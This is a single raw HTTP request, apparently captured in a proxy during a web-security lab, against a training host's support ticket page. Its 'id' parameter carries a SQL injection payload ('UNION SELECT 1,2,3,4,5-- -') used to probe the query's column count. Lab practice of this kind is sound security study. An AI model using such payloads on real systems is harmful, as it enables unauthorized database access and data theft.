GET /support/ticket.php?id=1' UNION SELECT 1,2,3,4,5-- - HTTP/1.1
Host: web0x00.hbtn
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://web0x00.hbtn/support/
Cookie:PHPSESSID=.eJxFyksKgCAURuG9_GMJmzoqWkIrULyR4AuvUhDtPaGBw_NxHqw2uMhQh_ZMAlvjmgKVIXvLOZXaoZbWm4J2Hgr8-3KRkbeU02lqhICzULNAYypRBxoj3g8vsSW4.aNFG1w.bdhkQpdYTrPwvFfS5puYrsF7LYg
Upgrade-Insecure-Requests: 1
